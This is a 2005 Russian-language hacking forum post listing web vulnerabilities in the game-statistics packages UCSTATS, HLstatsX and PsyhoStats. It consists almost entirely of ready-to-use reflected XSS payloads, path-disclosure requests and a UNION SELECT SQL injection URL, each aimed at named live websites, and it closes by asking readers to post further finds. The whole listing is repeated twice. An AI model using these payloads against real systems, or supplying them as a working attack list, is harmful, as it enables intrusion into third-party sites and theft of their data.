max_pain89
16.09.2005, 21:01
UCSTATS 1.1
Пример: http://cs.shadowzone.ru/stats/
XSS пассивный
stats.php?game=<script>alert();</script>
stats.php?q=search&query=%22%3E%3Cscript%3Ealert();</script>&qtype=name
Полное раскрытие пути
stats.php?game=../..
http://cs.shadowzone.ru/stats/stats.php?game=cstrike&q=player&uid=cec315cf55f1af878ce9cd8b852dc4fd§ion=weapons&sort=-1&dir=-1
http://cs.shadowzone.ru/stats/stats.php?game=cstrike&q=player&uid=cec315cf55f1af878ce9cd8b852dc4fd§ion=maps&sort=map&dir=-1
пассивный SQL-inj
stats.php?game=cstrike&q=player&uid=верный юид§ion=weapons&sort=weapon_kills_percent&dir=asc1
http://cs.shadowzone.ru/stats/stats.php?game=cstrike&q=player&uid=cec315cf55f1af878ce9cd8b852dc4fd§ion=weapons&sort=weapon_kills_percent&dir=asc1
Что-то наклёвывается SQL
http://cs.shadowzone.ru/stats/stats.php?game=cstrike&q=awards&month=2&year=-1%20UNION%20SELECT%20award_month,%20award_month%20 FROM%20ucstats_awards%20WHERE%20GAME=cstrike%20AND %20award_year=2005%20ORDER%20BY%20award_month%20DE SC/*
stats.php?game=cstrike&q=awards&month=2&year=[SQL]
HLstatsX RC 10
Пример: http://www.halflife2.ainet.at/hlstats.php
XSS пассивный
hlstats.php?mode=admin в поле UserName вписать: "><script>
hlstats.php?mode=actioninfo&action=Dropped_The_Bomb<script>alert()</script>&game=css
hlstats.php?mode=mapinfo&map=<script>alert()</script>&game=css
hlstats.php?mode=search&q="><script>alert()</script><a%20scr="&st=player&game=css
hlstats.php?mode=search&q=2&st="><script>alert()</script><a%20scr="&game=css&sort=name1
PsyhoStats 2.3
Пример: http://www.cs-source.ru/stats/
Полное раскрытие пути
imgskill.php?plrid=9&w=0
Если что-то еще нашли, постите
Пример: http://cs.shadowzone.ru/stats/
XSS пассивный
stats.php?game=<script>alert();</script>
stats.php?q=search&query=%22%3E%3Cscript%3Ealert();</script>&qtype=name
Полное раскрытие пути
stats.php?game=../..
http://cs.shadowzone.ru/stats/stats.php?game=cstrike&q=player&uid=cec315cf55f1af878ce9cd8b852dc4fd§ion=weapons&sort=-1&dir=-1
http://cs.shadowzone.ru/stats/stats.php?game=cstrike&q=player&uid=cec315cf55f1af878ce9cd8b852dc4fd§ion=maps&sort=map&dir=-1
пассивный SQL-inj
stats.php?game=cstrike&q=player&uid=верный юид§ion=weapons&sort=weapon_kills_percent&dir=asc1
http://cs.shadowzone.ru/stats/stats.php?game=cstrike&q=player&uid=cec315cf55f1af878ce9cd8b852dc4fd§ion=weapons&sort=weapon_kills_percent&dir=asc1
Что-то наклёвывается SQL
http://cs.shadowzone.ru/stats/stats.php?game=cstrike&q=awards&month=2&year=-1%20UNION%20SELECT%20award_month,%20award_month%20 FROM%20ucstats_awards%20WHERE%20GAME=cstrike%20AND %20award_year=2005%20ORDER%20BY%20award_month%20DE SC/*
stats.php?game=cstrike&q=awards&month=2&year=[SQL]
HLstatsX RC 10
Пример: http://www.halflife2.ainet.at/hlstats.php
XSS пассивный
hlstats.php?mode=admin в поле UserName вписать: "><script>
hlstats.php?mode=actioninfo&action=Dropped_The_Bomb<script>alert()</script>&game=css
hlstats.php?mode=mapinfo&map=<script>alert()</script>&game=css
hlstats.php?mode=search&q="><script>alert()</script><a%20scr="&st=player&game=css
hlstats.php?mode=search&q=2&st="><script>alert()</script><a%20scr="&game=css&sort=name1
PsyhoStats 2.3
Пример: http://www.cs-source.ru/stats/
Полное раскрытие пути
imgskill.php?plrid=9&w=0
Если что-то еще нашли, постите